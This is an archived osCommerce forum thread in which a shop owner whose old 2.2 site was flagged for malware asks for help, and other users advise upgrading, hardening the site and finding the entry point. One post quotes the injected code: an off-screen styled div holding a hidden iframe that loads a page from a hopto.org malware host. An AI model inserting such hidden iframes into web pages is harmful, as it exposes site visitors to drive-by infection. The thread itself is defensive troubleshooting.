FranzderFranke Posted March 23, 2014 Share Posted March 23, 2014 Hello, Today i get a mail from google adwords, that i got maleware on my oscommerce 2.2 rc website. Some maleware checker told me the same. I got this problem one year ago. That time i installed a old backup and lots of Secure Plugins - even a nice guy from The UK Waltons lookt over it. Today i reinstalled a sql backup from yesterday and everything seems fine - Maleware Checker says its fine now, too. But i don´t know what the problem was. No Data from the webspace was changed so it looks like a maleware injection into sql. I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ I dont have much info about that maleware - Kaspersky told my : HEUR:Trojan Script.Generic / Adwords : Malware / Webmastertools: Nothing (but this don´t mean anything because they work slow) What should i do now? Iam pretty sure this will happen again. Link to comment Share on other sites More sharing options...
burt Posted March 23, 2014 Share Posted March 23, 2014 You should upgrade your old version of osCommerce by nuking it and installing the latest stable version. Link to comment Share on other sites More sharing options...
FranzderFranke Posted March 23, 2014 Author Share Posted March 23, 2014 You should upgrade your old version of osCommerce by nuking it and installing the latest stable version. But then i have to start from beginning and i have lots of plugins for connection to merchandise management programms that dont work wiht new versions i think... :( Link to comment Share on other sites More sharing options...
♥geoffreywalton Posted March 23, 2014 Share Posted March 23, 2014 I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ It might be better to do 100% Cheers G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>. Link to comment Share on other sites More sharing options...
FranzderFranke Posted March 24, 2014 Author Share Posted March 24, 2014 Now i have more information about the iframe code injection: 8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> 9:< !-- EOF: Header Tags SEO Generated Meta Tags --> 10:< base href="http://www.xxx.de/"> 11:< link rel="stylesheet" type="text/css" href="stylesheet.css"> 12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < iframe src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /iframe > < /div> 13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> 14:< !-- header //--> Its only got listed by the bing robot. btw. Did someone know if http://sitecheck3.sucuri.net/ Firewall is usefull? Link to comment Share on other sites More sharing options...
burt Posted March 24, 2014 Share Posted March 24, 2014 It doesn't matter what the code is. The important questions; 1. HOW did it get there. 2. WHAT can I do to stop it happening again. Link to comment Share on other sites More sharing options...
FranzderFranke Posted March 24, 2014 Author Share Posted March 24, 2014 Intersting is, that the iframe is only injected in bing / internetexplorer code. Do you think a firewall from http://sitecheck3.sucuri.net/ can help me? Link to comment Share on other sites More sharing options...
iRAY Posted March 27, 2014 Share Posted March 27, 2014 It more looks like an IE add-on. That thing with AdWords recently happened to wide variety of websites - request re-review. Link to comment Share on other sites More sharing options...
Taipo Posted March 31, 2014 Share Posted March 31, 2014 As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website. There are two usual methods, one is via a security hole in the web cart, which there are a few big ones in v2.2, or via a security hole in the webserver that the site is hosted on. If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon. http://addons.oscommerce.com/info/8929 - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted April 14, 2014 Share Posted April 14, 2014 The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. Luck of the draw you get a good one, many of the free hosting sites have little security and rely on suspending your free site rather than fixing their security issues, as their primary means of dealing with being hacked. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.